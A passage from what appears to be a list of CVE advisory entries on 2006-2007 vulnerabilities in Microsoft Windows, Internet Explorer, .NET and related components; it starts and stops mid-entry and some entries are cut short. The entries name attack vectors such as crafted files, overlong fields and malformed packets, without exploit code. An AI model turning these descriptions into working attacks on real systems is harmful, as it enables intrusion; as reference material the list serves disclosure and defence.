Vulnerability." [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a 